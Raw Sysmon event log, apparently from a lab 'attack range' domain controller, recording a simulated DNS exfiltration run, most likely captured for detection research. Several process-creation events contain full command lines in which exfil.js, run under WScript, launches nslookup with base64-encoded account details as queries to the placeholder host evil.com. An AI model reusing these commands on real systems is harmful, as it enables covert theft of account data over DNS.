14:21:42.607{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2A45-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.607{2E1864BB-18F6-629A-2845-000000005F02}10807536C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-2A45-000000005F02}7368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.608{2E1864BB-18F6-629A-2A45-000000005F02}7368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-2845-000000005F02}1080C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnzbuc.tmp 2>&1 10341000x8000000000000000212697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.570{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2945-000000005F02}4572C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.570{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2945-000000005F02}4572C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.554{2E1864BB-18F6-629A-2945-000000005F02}45727000C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2845-000000005F02}1080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.554{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2945-000000005F02}4572C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2845-000000005F02}1080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-18E0-629A-6742-000000005F02}39767912C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-2845-000000005F02}1080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.538{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.542{2E1864BB-18F6-629A-2845-000000005F02}1080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnzbuc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.523{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgzw.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-18F6-629A-2645-000000005F02}54207008C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2745-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2745-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.491{2E1864BB-18F6-629A-2545-000000005F02}40367408C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-2745-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.498{2E1864BB-18F6-629A-2745-000000005F02}4552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-2545-000000005F02}4036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgzw.tmp 2>&1 354300x8000000000000000212677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51022-false127.0.0.1-53domain 354300x8000000000000000212676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51022- 354300x8000000000000000212675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51022-false127.0.0.1-53domain 354300x8000000000000000212674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51021-false127.0.0.1-53domain 354300x8000000000000000212673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51021- 354300x8000000000000000212672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51021-false127.0.0.1-53domain 354300x8000000000000000212671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{00000000-0000-0000-0000-000000000000}3872<unknown process>-udpfalsefalse127.0.0.1-51020-false127.0.0.1-53domain 354300x8000000000000000212670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51020- 354300x8000000000000000212669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.086{00000000-0000-0000-0000-000000000000}3872<unknown process>-udptruefalse127.0.0.1-51020-false127.0.0.1-53domain 354300x8000000000000000212668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.027{00000000-0000-0000-0000-000000000000}3396<unknown process>-udpfalsefalse127.0.0.1-51019-false127.0.0.1-53domain 354300x8000000000000000212667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51019- 354300x8000000000000000212666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.026{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-51019-false127.0.0.1-53domain 354300x8000000000000000212665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{00000000-0000-0000-0000-000000000000}3236<unknown process>-udpfalsefalse127.0.0.1-51018-false127.0.0.1-53domain 354300x8000000000000000212664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51018- 354300x8000000000000000212663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51017- 354300x8000000000000000212662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.926{00000000-0000-0000-0000-000000000000}3236<unknown process>-udptruefalse127.0.0.1-51017-false127.0.0.1-53domain 354300x8000000000000000212661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.925{00000000-0000-0000-0000-000000000000}3236<unknown process>-udpfalsefalse127.0.0.1-51016-false127.0.0.1-53domain 354300x8000000000000000212660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.925{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51016- 354300x8000000000000000212659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51015- 354300x8000000000000000212658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51015-false127.0.0.1-53domain 354300x8000000000000000212657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51014- 354300x8000000000000000212656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.861{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51013- 10341000x8000000000000000212655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.469{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2645-000000005F02}5420C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.469{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2645-000000005F02}5420C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.454{2E1864BB-18F6-629A-2645-000000005F02}54207008C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2545-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 